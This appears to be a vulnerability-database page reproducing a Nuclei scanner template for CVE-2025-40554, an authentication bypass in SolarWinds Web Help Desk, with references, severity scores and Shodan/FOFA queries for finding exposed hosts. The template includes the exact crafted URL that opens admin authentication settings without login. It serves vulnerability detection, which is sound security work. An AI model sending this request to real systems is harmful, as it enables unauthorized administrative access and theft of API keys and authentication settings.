Lucene search
K

SolarWinds Web Help Desk - Authentication Bypass

🗓️ 18 Jun 2026 12:11:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

SolarWinds Web Help Desk up to 12.8.8 HF1 suffers an authentication bypass exposing admin configurations including SAML/CAS and API keys.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-40554
31 Jan 202608:17
githubexploit
GithubExploit
Exploit for CVE-2025-40554
29 Jan 202614:53
githubexploit
ATTACKERKB
CVE-2025-40551
28 Jan 202607:33
attackerkb
ATTACKERKB
CVE-2025-40554
28 Jan 202607:36
attackerkb
Circl
CVE-2025-40551
28 Jan 202610:02
circl
Circl
CVE-2025-40554
28 Jan 202610:14
circl
CISA KEV Catalog
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
3 Feb 202600:00
cisa_kev
CISA
CISA Adds Four Known Exploited Vulnerabilities to Catalog
3 Feb 202612:00
cisa
CNNVD
SolarWinds Web Help Desk security vulnerabilities
28 Jan 202600:00
cnnvd
CNNVD
SolarWinds Web Help Desk code-related vulnerabilities
28 Jan 202600:00
cnnvd
Rows per page
id: CVE-2025-40554

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: Bushi-gg
  severity: critical
  description: |
    SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endpoint, an unauthenticated attacker can access privileged administrative functions including authentication configuration settings, SAML/CAS setup, and API key management.
  impact: |
    An attacker can bypass authentication and access administrative configuration pages, potentially leading to full system compromise through authentication method manipulation.
  remediation: |
    Update to Web Help Desk version 2026.1 or later.
  reference:
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40554
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40554
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40554
    epss-score: 0.57314
    epss-percentile: 0.98951
    cwe-id: CWE-1390
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:"1895809524"
    fofa-query: icon_hash="1895809524"
    product: web_help_desk
    vendor: solarwinds
  tags: cve,cve2025,solarwinds,whd,auth-bypass,vuln,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AAAAAAAAAAAAAAAAAAAAAA/1.0?badparam=/ajax/&wopage=LoginPref HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "externalAuthContainer", "Authentication Settings", "admin_pswd")'
        condition: and
# digest: 4a0a00473045022049141da3d9bf41aeddf534215d7d92dd5d6cbf23cba8aeb761308a6198f3de56022100bb487afb037ac9ab8f682ea146226b3371ee8512d335cc869d23fcb8e903bca1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2026 14:18Current
8.7High risk
Vulners AI Score8.7
CVSS 3.19.8
EPSS0.8413
SSVC
23